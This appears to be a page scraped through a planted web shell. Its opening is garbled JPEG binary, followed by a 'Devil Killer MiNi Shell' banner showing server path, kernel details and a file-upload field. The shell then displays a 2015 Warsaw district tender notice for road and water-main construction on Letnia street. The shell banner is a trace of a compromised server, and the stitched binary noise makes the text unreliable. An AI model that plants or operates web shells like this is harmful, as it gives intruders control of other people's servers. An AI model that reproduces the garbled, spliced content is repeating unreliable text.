JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150901/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150901/225998-N-2015.html

<p class="kh_header"><b>Warszawa: BUDOWA ULICY LETNIEJ ORAZ BUDOWA SIECI WODOCIĄGOWEJ NA TERENIE  DZIELNICY WESOŁA M.ST. WARSZAWY</b><br>
<b>Numer ogłoszenia: 225998 - 2015; data zamieszczenia: 01.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Stołecznego Warszawy dla Dzielnicy Wesoła , ul. 1 Praskiego Pułku 33, 05-075 Warszawa, woj. mazowieckie, tel. 22 773-60-27, faks 22 773-60-99.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wesola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA ULICY LETNIEJ ORAZ BUDOWA SIECI WODOCIĄGOWEJ NA TERENIE  DZIELNICY WESOŁA M.ST. WARSZAWY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest budowa ulicy Letniej (budowa drogi wraz odwodnieniem, rozbudowa oświetlenia), przebudowa istniejącego przewodu wodociągowego DN 150,100,50 mm oraz budowa przewodu wodociągowego w ul. Letniej i J. U. Niemcewicza DN 100 mm L=233,5 m na odcinku od istniejącego przewodu wodociągowego w ul. Mickiewicza do wysokości posesji nr 64/66 przy ul. J. U. Niemcewicza wraz z przebudową przyłączy wodociągowych na terenie Dzielnicy Wesoła m.st. Warszawy.

Do zakresu robót związanego z powyższym zadaniem należy wykonanie:

1. Rozbudowa oświetlenia ulicznego
- budowa napowietrznej linii kablowej oświetlenia ulicznego,
- wymiana opraw oświetleniowych wraz z wysięgnikami,
- budowa aluminiowych słupów oświetleniowych wraz z oprawami.

2. Budowa odwodnienia 
- wykonanie krytych betonowymi płytami ażurowymi rowów wypełnionych tłuczniem,
- roboty ziemne i zasypowe.

3. Roboty drogowe 
- wykonanie robót przygotowawczych polegających na robotach pomiarowych, usunięciu warstwy ziemi urodzajnej,
- roboty towarzyszące polegające na ścinaniu drzew i karczowaniu pni, 
- wykonanie robót rozbiórkowych,
- załadunek i wywiezienie gruzu,
- wykonanie robót ziemnych z transportem mas ziemnych i zagęszczeniem nasypów,
- profilowanie i zagęszczenie podłoża,
- wykonanie odwodnienia powierzchniowego na pobocza utwardzone betonowymi płytami ażurowymi,
- wykonanie konstrukcji nawierzchni jezdni KR-2 z betonu asfaltowego (warstwa podbudowy zasadniczej z BA gr. 9cm, warstwy nawierzchni ścieralnej z BA gr. 5cm) na podbudowie z kruszywa łamanego gr. 20 cm i warstwie odsączającej z pospółki gr. 15 cm,
- wykonanie zjazdów na posesję z kostki brukowej betonowej grub. 8 cm (kolor czerwony) na podsypce cementowo piaskowej 3 cm, podbudowie z kruszywa łamanego gr. 20 cm i warstwie odsączającej gr. 15 cm,
- wykonanie regulacji: studni rewizyjnych kanalizacji sanitarnej i deszczowej, zaworów wodociągowych i gazowych,
- wdrożenie projektu stałej organizacji ruchu.

4. Przebudowa istniejącego przewodu wodociągowego DN 150,100,50 mm oraz budowa przewodu wodociągowego w ul. Letniej i J. U. Niemcewicza DN 100 mm L=233,5 m na odcinku od istniejącego przewodu wodociągowego w ul. Mickiewicza do wysokości posesji nr 64,66 przy ul. J. U. Niemcewicza wraz z przebudową przyłączy wodociągowych.
Zakres robót został określony w projekcie budowlanym i wykonawczym sieci wodociągowej DN 150,100,50mm L ca 200mm w ul. Letniej ze zmianą średnicy na odcinku od istniejącego przewodu wodociągowego DN 100mm w ul. Mickiewicza do wysokości posesji nr 62 przy ul. J.U. Niemcewicza wraz z dokumentacją przebudowy wszystkich istniejących przyłączy wodociągowych DN 100mm L ca 30m w ul. Letniej i ul. J.U. Niemcewicza na odcinku od wysokości posesji nr 62 przy ul. J.U. Niemcewicza do granic opracowania materiałów do ZRID, opracowanym w lipcu 2015 r. przez Pracownię Projektową PRO STUDIO Sp. z o.o.
Omawiana sieć zostanie usytuowana w ul. Letniej - w pasie drogowym ulicy 
w oparciu o projekt drogowy opracowany na zlecenie Urzędu Dzielnicy Wesoła 
m.st. Warszawa. 
Ulica Letnia jest drogą gminną zlokalizowana na terenie zabudowanym.
Droga pozostaje w zarządzie Dzielnicy Wesoła m. st. Warszawa. 
Ulica Letnia krzyżuje się z:
ul. Mickiewicza - jest to skrzyżowanie równorzędne (droga gminna),
ul. Niemcewicza - w chwili obecnej nie stanowi skrzyżowania (droga gminna).
W istniejącym podłożu gruntowym występują proste warunki gruntowo-wodne. 
Grunty zakwalifikowano do pierwszej kategorii geotechnicznej (grupa nośności G1).Obecnie, zabudowania przy ul. Letniej od strony ul. Mickiewicza zasilane są z sieci wodociągowej DN150,DN100 (dz. nr 11-7, 11-8, 17, 18, 19, 21-2, 22, 23), natomiast od strony ul. Niemcewicza z sieci DN50 (dz. nr 11-1, 11-3, 11-4, 36, 37, 38, 39). Włączenie projektowanego wodociągu należy wykonać do istniejącego wodociągu DN 100 mm w ul. Mickiewicza. Wodociąg  w ul. Niemcewicza zakończyć hydrantem montowanym na trójniku redukcyjnym z zaślepką na wysokości posesji nr 64,66. Wodociąg należy wykonać z rur z żeliwa sferoidalnego DN100 PN10 zgodnych z normą PN-EN 545 o połączeniach kielichowych ze złączami nieblokowanymi. Na trasie wodociągu należy zamontować hydrant przeciwpożarowy podziemny. Hydranty należy zamontować na trójniku kielichowo kołnierzowym DN100,80mm i wyposażyć w żeliwne skrzynki uliczne. Odcinki przyłączy w granicach inwestycji drogowej należy wykonać z rur PE DN50 x4,6 mm. Włączenie do projektowanego wodociągu należy wykonać poprzez opaskę z odejściem kołnierzowym. Bezpośrednio za opaską należy zamontować zasuwę kołnierzową. 
Istniejące uzbrojenie przeznaczone do likwidacji należy zdemontować i przekazać na majątek Miejskiego Przedsiębiorstwa Wodociągów i Kanalizacji w Warszawie (HP883; HP8835; ZL27144).
Wykopy będą prowadzone w gruncie suchym, głównie nasypowym składającym się z piasków średnich i drobnych. Wszystkie przewody wodociągowe należy układać w wykopach otwartych, wąskoprzestrzennych o ścianach pionowych umocnionych do rzędnej terenu, wykonywane przy użyciu sprzętu mechanicznego, a w pobliżu istniejącego uzbrojenia podziemnego - ręcznie. W wykonanych odwiertach nie stwierdzono wody gruntowej. 
Pod rury należy wykonać podsypkę z piasku grubości 20 cm. Na obsypkę 
i zasypkę wstępną rur stosować piasek do wysokości 30 cm ponad wierzch przewodu. Trasę przewodów oznaczać taśmą ostrzegawczą koloru niebieskiego z zatopioną wkładką metalową. Taśmę należy prowadzić na wysokości 30 cm nad grzbietem rury. Zagęszczenie obsypki należy bezwzględnie wykonać ręcznie. Dalszą zasypkę wykopu wykonać dowiezionym piaskiem, warstwami 20cm, zasypkę zagęścić do stopnia zagęszczenia nie mniej niż 0,97, a w warstwie drogowej zgodnie z technologią i stopniem zagęszczenia przyjętym w części drogowej projektu. Nadmiar ziemi należy wywieźć, częściowo rozplantować. Przy skrzyżowaniu tras wykopów z istniejącym uzbrojeniem roboty ziemne prowadzić ręcznie, a odkryte przewody zabezpieczyć przed uszkodzeniem. Przed przystąpieniem do układania przewodów należy sprawdzić średnice istniejących przewodów oraz rzędne posadowienia.
Wykonawca robót będący posiadaczem odpadów (wytwórca) zobowiązany jest posiadać stosowne pozwolenia na prowadzenie gospodarki odpadami w tym na ich transport (Ustawa z dn. 27.04.001 o odpadach - Dz. U. nr 62 poz. 628 z późniejszymi zmianami).
Wszelkie zanieczyszczenia (np. ziemia z wykopów, kruszywo, mieszanka betonowa, opakowania materiałów itp.) lub uszkodzenia dróg publicznych i dojazdów do terenu budowy Wykonawca będzie powinien usuwać na bieżąco i na własny koszt.
Wszystkie materiały z robót rozbiórkowych oraz odpady powstałe w czasie robót przygotowawczych i budowlanych zostaną zagospodarowane zgodnie z wymogami ochrony środowiska w sposób następujący:
humus zebrany w trakcie robót ziemnych będzie zabezpieczony i ponownie użyty w robotach rekultywacyjnych,
grunty z wykopów zostaną wywiezione na odkład,
gruz betonowy powstały w trakcie wyburzeń nawierzchni dróg i placów zostanie przekazany do recyklingu,
odpady żelazne oraz metali kolorowych zostaną przekazane do odzysku,
odpady plastikowe zostaną posegregowane i przekazane do odzysku, a nie dające się wykorzystać zostaną unieszkodliwione.
Wykonawca w składanej ofercie powinien uwzględnić warunki odtworzenia nawierzchni 
po przeprowadzonych robotach budowlanych przewodu wodociągowego. 
Wycena prac ma być sporządzona na podstawie załączonej dokumentacji projektowej. Przedmiary stanowią jedynie element pomocniczy do sporządzenia oferty.
Przed rozpoczęciem robót należy zapoznać się i stosować uwagi zawarte w:
Protokole z narady koordynacyjnej w sprawie uzgodnienia usytuowania projektowanej sieci uzbrojenia terenu, 
Uzgodnieniach: MPWiK S.A., 
Warunkach decyzji administracyjnych.
5. Przygotowanie oraz przekazanie w dwóch egzemplarzach, w wersji papierowej i elektronicznej (zgodnie z zarządzeniem nr 3479-2009 Prezydenta miasta stołecznego Warszawy z dnia 29 lipca 2009 r. w sprawie zasad prowadzenia elektronicznej ewidencji dróg publicznych, obiektów mostowych, tuneli i przepustów na obszarze m.st. Warszawy, których zarządcą jest prezydent m.st. Warszawy oraz pozyskiwania dokumentacji powykonawczej w zakresie inwestycji, modernizacji i remontów w pasie drogowym w postaci cyfrowej) dokumentacji powykonawczej budowlanej i geodezyjnej wraz z naniesieniem na mapę zasadniczą miasta..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>1. Rozbudowa oświetlenia ulicznego
	- budowa napowietrznej linii kablowej oświetlenia ulicznego,
	- wymiana opraw oświetleniowych wraz z wysięgnikami,
	- budowa aluminiowych słupów oświetleniowych wraz z oprawami.

2. Budowa odwodnienia 
- wykonanie krytych betonowymi płytami ażurowymi rowów wypełnionych tłuczniem,
- roboty ziemne i zasypowe.

3. Roboty drogowe 
- wykonanie robót przygotowawczych polegających na robotach pomiarowych, usunięciu warstwy ziemi urodzajnej,
- roboty towarzyszące polegające na ścinaniu drzew i karczowaniu pni, 
- wykonanie robót rozbiórkowych,
- załadunek i wywiezienie gruzu,
- wykonanie robót ziemnych z transportem mas ziemnych i zagęszczeniem nasypów,
- profilowanie i zagęszczenie podłoża,
- wykonanie odwodnienia powierzchniowego na pobocza utwardzone betonowymi płytami ażurowymi,
- wykonanie konstrukcji nawierzchni jezdni KR-2 z betonu asfaltowego (warstwa podbudowy zasadniczej z BA gr. 9cm, warstwy nawierzchni ścieralnej z BA gr. 5cm) na podbudowie z kruszywa łamanego gr. 20 cm i warstwie odsączającej z pospółki gr. 15 cm,
- wykonanie zjazdów na posesję z kostki brukowej betonowej grub. 8 cm (kolor czerwony) na podsypce cementowo piaskowej 3 cm, podbudowie z kruszywa łamanego gr. 20 cm i warstwie odsączającej gr. 15 cm,
- wykonanie regulacji: studni rewizyjnych kanalizacji sanitarnej i deszczowej, zaworów wodociągowych i gazowych,
- wdrożenie projektu stałej organizacji ruchu.

4. Przebudowa istniejącego przewodu wodociągowego DN 150,100,50 mm oraz budowa przewodu wodociągowego w ul. Letniej i J. U. Niemcewicza DN 100 mm L=233,5 m na odcinku od istniejącego przewodu wodociągowego w ul. Mickiewicza do wysokości posesji nr 64,66 przy ul. J. U. Niemcewicza wraz z przebudową przyłączy wodociągowych.
Do 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.14.00-9, 45.31.61.10-9, 45.10.00.00-8, 45.20.00.00-9, 45.11.00.00-1, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca ubiegający się o udzielenie zamówienia jest zobowiązany wnieść wadium przed upływem terminu składania ofert w wysokości 17 000,- zł (słownie: siedemnaście tysięcy złotych).
Nie wniesienie wadium w wymaganym terminie, wymaganej wysokości i formie, zgodnie 
 z art. 24 ust. 2 pkt 2 ustawy, skutkuje wykluczeniem wykonawcy z postępowania.
2. 	Wadium może być wniesione w:
a)	w pieniądzu - wniesione przelewem bankowym na konto Urzędu Dzielnicy Wesoła 
m.st. Warszawy - Nr konta: 52 1030 1508 0000 0005 5001 5129 - wymogiem jest, aby wadium wniesione zostało przed upływem terminu składania ofert;
       b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym, że zobowiązania kasy są zawsze zobowiązaniem pieniężnym;
       c) gwarancjach bankowych;
       d) gwarancjach ubezpieczeniowych;
       e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 B ust. 5 pkt 2 ustawy 
z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
Nr 109 poz. 1158 z późn. zm.)
3. Wadium wniesione w formach określonych w pkt. b, c, d, e, należy złożyć w kasie Urzędu Dzielnicy Wesoła m.st. Warszawy, a kserokopię dokumentu, poświadczoną za zgodność 
z oryginałem przez wykonawcę  dołączyć do oferty.
4. W przypadku wniesienia wadium w pieniądzu - kopię dowodu wniesienia wadium, poświadczoną za zgodność z oryginałem przez wykonawcę  należy dołączyć do oferty.
5.   Zwrot jak i zatrzymanie wadium opisuje art. 46 ustawy - Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wykonawca wykaże wykonanie w okresie ostatnich pięciu lat, przed dniem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum dwóch robót budowlanych, polegających na remoncie, budowie lub przebudowie dróg  publicznych (min. klasy L lub D) o nawierzchni z betonu asfaltowego lub kostki betonowej o wartości nie mniejszej niż 480 000,- zł brutto każda, oraz minimum dwóch robót budowlanych, polegających na budowie sieci wodociągowej o wartości  nie mniejszej niż 100 000,- zł brutto każda. Wykonawca przedłoży wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca zobowiązany jest załączyć prawidłowo wypełniony załącznik wg wzoru określonego w załączniku nr 4. (W przypadku podmiotów występujących wspólnie, dokument ten składają Ci Wykonawcy (lub Wykonawca), którzy spełniają warunek udziału  w postępowaniu),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia 
- kierownicy robót (min. po jednej osobie) posiadają odpowiednie uprawnienia zgodnie 
z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jednolity Dz. U. z 2010, nr 243, poz. 1623 z późn. zm.) w specjalnościach:
- drogowej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych, lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zamówienia.
 (w przypadku podmiotów występujących wspólnie dokument ten składają Ci Wykonawcy, którzy spełniają warunek udziału w postępowaniu).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji na wykonane roboty budowlane - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
